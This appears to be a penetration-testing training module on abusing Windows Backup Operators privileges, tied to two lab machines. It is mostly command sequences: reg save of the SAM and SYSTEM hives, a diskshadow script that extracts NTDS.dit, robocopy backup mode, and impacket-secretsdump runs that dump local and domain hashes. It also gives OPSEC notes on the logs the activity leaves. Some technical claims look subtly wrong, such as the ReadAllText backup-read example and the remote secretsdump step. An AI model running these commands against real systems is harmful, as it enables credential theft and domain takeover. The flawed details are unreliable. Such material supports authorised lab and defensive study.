Back to All Modules

Backup Operators Abuse

#Overview

The Backup Operators group has two powerful privileges: SeBackupPrivilege (read any file regardless of ACL) and SeRestorePrivilege (write any file regardless of ACL). These privileges allow reading the SAM/SYSTEM registry hives and the NTDS.dit Active Directory database — effectively granting credential extraction equivalent to domain admin.

#Prerequisites

  • Membership in the Backup Operators group (or possession of SeBackupPrivilege/SeRestorePrivilege)
  • Ability to execute commands on the target

#Detection & Enumeration

# Check current user's group memberships
whoami /groups

# Check for Backup Operators group membership
net group "Backup Operators" /domain

# Check for specific privileges
whoami /priv | findstr /i "SeBackupPrivilege SeRestorePrivilege"

# Check if user can read restricted files
type C:\Windows\System32\config\SAM 2>nul && echo "SeBackupPrivilege works" || echo "Access denied"
POWERSHELL

#Exploitation / Execution

#Reading SAM & SYSTEM with SeBackupPrivilege

:: Enable the privilege (may already be enabled in certain shells)
:: Method 1: Using reg save (requires the privilege to be enabled)
reg save hklm\sam C:\temp\sam.bak
reg save hklm\system C:\temp\system.bak

:: Transfer to attacker and parse
impacket-secretsdump.py -sam sam.bak -system system.bak LOCAL
CMD

#Using diskshadow for NTDS.dit Extraction

:: Create a diskshadow script file
echo set context persistent nowriters > C:\temp\shadow.dsh
echo add volume C: alias vss1 >> C:\temp\shadow.dsh
echo create >> C:\temp\shadow.dsh
echo exec copy %vss1%\Windows\NTDS\ntds.dit C:\temp\ntds.dit >> C:\temp\shadow.dsh
echo exec copy %vss1%\Windows\System32\config\SYSTEM C:\temp\system.bak >> C:\temp\shadow.dsh
echo delete shadows all >> C:\temp\shadow.dsh
echo reset >> C:\temp\shadow.dsh

:: Execute the diskshadow script
diskshadow /s C:\temp\shadow.dsh

:: Parse NTDS.dit
impacket-secretsdump.py -ntds ntds.dit -system system.bak LOCAL
CMD

#Using robocopy with Backup Mode

:: Copy files bypassing ACLs with /b (backup mode)
robocopy /b C:\Windows\System32\config C:\temp\config SAM SYSTEM

:: The /b flag uses SeBackupPrivilege to bypass file permissions
robocopy /b C:\Windows\NTDS C:\temp\ntds ntds.dit
CMD

#Reading Files with PowerShell and Backup Privileges

# Using BackupPrivilege to read any file
# Import the required functions
Import-Module .\Invoke-BuildBackupPrivilege.ps1

# Read a file using backup semantics
# This uses BackupRead Win32 API which respects SeBackupPrivilege
$content = [System.IO.File]::ReadAllText("C:\Users\Administrator\Desktop\flag.txt")
POWERSHELL

#Remote SAM/SYSTEM Extraction via SMB

# Using secretsdump with Backup Operators credentials
impacket-secretsdump.py 'domain.local/backupuser:password@10.10.10.10' -just-dc-ntlm

# If Backup Operators can authenticate via WinRM
evil-winrm -i 10.10.10.10 -u backupuser -p 'password'
BASH

#Common Pitfalls

  • ⚠️ diskshadow requires the Backup Operators group AND the privileges must be enabled in the current token
  • ⚠️ SeBackupPrivilege does not grant write access to files — it only bypasses ACLs for read operations
  • ⚠️ SeRestorePrivilege allows bypassing ACLs for write operations but also allows changing file owner
  • ⚠️ NTDS.dit may be locked by the AD service — use volume shadow copy or diskshadow to get a consistent copy
  • ⚠️ robocopy /b requires both privileges (SeBackup and SeRestore) to copy from locked files

#OPSEC Considerations

  • 🛡️ Volume shadow copy creation generates Event ID 98 (VSS) and is visible to administrators
  • 🛡️ Registry save operations (reg save) generate Event ID 4657 when Object Access auditing is enabled
  • 🛡️ NTDS.dit copy attempts will fail if the file is locked by NTDS — always use VSS or diskshadow
  • 🛡️ The Backup Operators group membership itself is logged in the user's token and visible to EDR

#Post-Exploitation Value

Backup Operators membership is equivalent to domain admin for credential extraction purposes. From SAM/SYSTEM you get local hashes, and from NTDS.dit you get all domain hashes. This directly leads to domain compromise.

#Tool References

ToolLink
Impacket secretsdumphttps://github.com/fortra/impacket
diskshadowBuilt-in Windows tool
robocopyBuilt-in Windows tool
vssadminBuilt-in Windows tool

#Source Machines

  • Blackfield (Medium, AD/Windows)
  • Monteverde (Medium, AD)